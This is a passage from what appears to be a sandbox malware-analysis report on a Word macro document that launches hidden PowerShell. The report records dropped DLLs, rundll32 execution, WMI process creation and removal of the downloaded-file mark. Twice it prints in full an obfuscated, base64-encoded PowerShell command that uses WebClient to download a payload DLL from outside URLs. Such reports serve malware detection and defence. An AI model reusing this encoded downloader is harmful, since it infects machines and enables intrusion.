CsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Suspicious powershell command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                Source: Chpieog.dll.4.drStatic PE information: real checksum: 0x457fa should be: 0x416e4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A3493C push edx; retf
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A34B0B push eax; retf
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A33EFB push es; retf
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A342A3 push eax; retf
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000B0BD push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007BCA push ecx; ret

                Persistence and Installation Behavior:

                barindex
                Creates processes via WMIShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Ezfa\bvb.lliJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ezfa\bvb.lli:Zone.Identifier read attributes | delete
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
